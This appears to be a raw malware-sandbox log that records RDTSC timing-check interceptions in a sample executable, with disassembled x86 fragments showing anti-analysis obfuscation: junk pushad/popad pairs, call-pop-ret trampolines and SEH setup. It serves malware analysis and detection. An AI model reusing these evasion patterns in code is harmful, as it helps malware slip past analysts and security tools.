Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1117D2A second address: 1117D30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1117D30 second address: 1117D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 111BFA0 second address: 111C01E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F83ACE24F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c jmp 00007F83ACE24F31h 0x00000011 nop 0x00000012 xor edi, 31B63B63h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F83ACE24F28h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov bh, A0h 0x00000036 or dword ptr [ebp+1246575Bh], eax 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007F83ACE24F28h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 00000015h 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 movsx edi, cx 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e push ebx 0x0000005f jng 00007F83ACE24F26h 0x00000065 pop ebx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 111C01E second address: 111C02E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 111D091 second address: 111D0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACE24F34h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 111B13B second address: 111B13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 111B13F second address: 111B143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 111D327 second address: 111D32D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 112039C second address: 11203A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 111B143 second address: 111B1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F83ACDAA9E8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D3D47h] 0x00000028 mov edi, dword ptr [ebp+122D2DD9h] 0x0000002e jnc 00007F83ACDAA9ECh 0x00000034 push dword ptr fs:[00000000h] 0x0000003b mov ebx, edx 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 jmp 00007F83ACDAA9F0h 0x00000049 mov eax, dword ptr [ebp+122D134Dh] 0x0000004f mov dword ptr [ebp+122D301Bh], eax 0x00000055 push FFFFFFFFh 0x00000057 add edi, 515773BBh 0x0000005d nop 0x0000005e pushad 0x0000005f push edx 0x00000060 push eax 0x00000061 pop eax 0x00000062 pop edx 0x00000063 push eax 0x00000064 pushad 0x00000065 popad 0x00000066 pop eax 0x00000067 popad 0x00000068 push eax 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11203A2 second address: 11203D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c pushad 0x0000000d movzx edx, dx 0x00000010 mov ecx, 0ED964DAh 0x00000015 popad 0x00000016 push 00000000h 0x00000018 add bx, 8FC1h 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jg 00007F83ACE24F2Ch 0x00000026 jbe 00007F83ACE24F26h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 111A30C second address: 111A312 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 111B1C8 second address: 111B1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11203D8 second address: 11203DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 111B1CC second address: 111B1DA instructions: 0x00000000 rdtsc 0x00000002 je 00007F83ACE24F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1121404 second address: 1121465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, edx 0x0000000b push dword ptr fs:[00000000h] 0x00000012 sub dword ptr [ebp+122D1D9Eh], esi 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F83ACDAA9E8h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 and ebx, 15F5BEC3h 0x0000003f mov eax, dword ptr [ebp+122D0A65h] 0x00000045 or dword ptr [ebp+1244DD4Fh], esi 0x0000004b mov edi, edx 0x0000004d push FFFFFFFFh 0x0000004f mov edi, edx 0x00000051 nop 0x00000052 push edi 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1121465 second address: 1121486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F83ACE24F37h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 112B05F second address: 112B07F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACDAA9F5h 0x00000009 jnc 00007F83ACDAA9E6h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 112B07F second address: 112B085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 112A779 second address: 112A783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F83ACDAA9E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 112A783 second address: 112A787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 112A787 second address: 112A78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 112ABBC second address: 112ABC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 112ABC0 second address: 112ABC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 112ABC4 second address: 112ABCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 112ABCA second address: 112ABD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 112ABD6 second address: 112ABE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 ja 00007F83ACE24F26h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 112ABE5 second address: 112ABF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F83ACDAA9E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1134FA4 second address: 1134FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1134FAE second address: 1134FD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jbe 00007F83ACDAA9EEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1134FD0 second address: 1135005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 jnp 00007F83ACE24F26h 0x0000000d jmp 00007F83ACE24F31h 0x00000012 jmp 00007F83ACE24F2Ch 0x00000017 jg 00007F83ACE24F26h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1135005 second address: 1135009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1133BE6 second address: 1133BEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1133BEA second address: 1133BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1133BF0 second address: 1133C02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F2Dh 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1134149 second address: 1134150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1134150 second address: 1134159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1134159 second address: 113415D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 113479C second address: 11347A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11347A0 second address: 11347BA instructions: 0x00000000 rdtsc 0x00000002 je 00007F83ACDAA9E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F83ACDAA9ECh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11347BA second address: 11347C0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11347C0 second address: 11347DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9F9h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 113494C second address: 1134999 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnl 00007F83ACE24F26h 0x00000009 js 00007F83ACE24F26h 0x0000000f pop edi 0x00000010 jc 00007F83ACE24F3Ah 0x00000016 jmp 00007F83ACE24F34h 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F83ACE24F38h 0x00000025 jng 00007F83ACE24F26h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1134999 second address: 113499D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1134C9B second address: 1134CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1134CA6 second address: 1134CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1134E4B second address: 1134E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1139F76 second address: 1139F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1139F7C second address: 1139F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1139F81 second address: 1139FB1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F83ACDAA9FFh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F83ACDAA9EBh 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 113A538 second address: 113A548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007F83ACE24F26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 113A6CC second address: 113A6D6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F83ACDAA9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 113A834 second address: 113A839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 113AAE7 second address: 113AAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 113AC62 second address: 113ACAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F83ACE24F36h 0x0000000f jmp 00007F83ACE24F35h 0x00000014 jmp 00007F83ACE24F31h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10BE78D second address: 10BE7A1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F83ACDAA9E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F83ACDAA9ECh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11399F5 second address: 11399FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11399FA second address: 1139A00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1139A00 second address: 1139A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1139A06 second address: 1139A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11411DD second address: 1141212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F2Bh 0x00000007 jmp 00007F83ACE24F2Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F83ACE24F37h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1141212 second address: 1141216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 110E321 second address: 110E327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 110E804 second address: 110E808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 110E808 second address: 110E80C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 110E8FF second address: 110E94C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F83ACDAA9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jne 00007F83ACDAA9F4h 0x00000011 xchg eax, esi 0x00000012 mov dword ptr [ebp+1244E90Eh], eax 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F83ACDAA9EEh 0x00000021 jmp 00007F83ACDAA9F4h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 110E94C second address: 110E951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 110F45C second address: 110F460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 110F460 second address: 110F4BE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jmp 00007F83ACE24F2Ch 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D1DECh], esi 0x00000014 lea eax, dword ptr [ebp+12488EB9h] 0x0000001a cmc 0x0000001b jbe 00007F83ACE24F32h 0x00000021 nop 0x00000022 jmp 00007F83ACE24F31h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F83ACE24F35h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 114154B second address: 114155A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F83ACDAA9E6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 114155A second address: 1141560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 114168D second address: 1141691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11417F7 second address: 11417FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11417FB second address: 114181C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 114181C second address: 1141820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11419AB second address: 11419B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11419B0 second address: 11419EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACE24F2Eh 0x00000009 jnc 00007F83ACE24F26h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F83ACE24F2Ch 0x00000017 jmp 00007F83ACE24F35h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1141E35 second address: 1141E73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9F9h 0x00000007 jmp 00007F83ACDAA9F0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F83ACDAA9EBh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1146655 second address: 1146688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F83ACE24F35h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F83ACE24F2Eh 0x00000014 popad 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1146688 second address: 1146695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1146A8E second address: 1146AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop esi 0x0000000e push edi 0x0000000f jmp 00007F83ACE24F2Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 jmp 00007F83ACE24F2Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1146C15 second address: 1146C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1146C1C second address: 1146C26 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F83ACE24F2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1146C26 second address: 1146C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
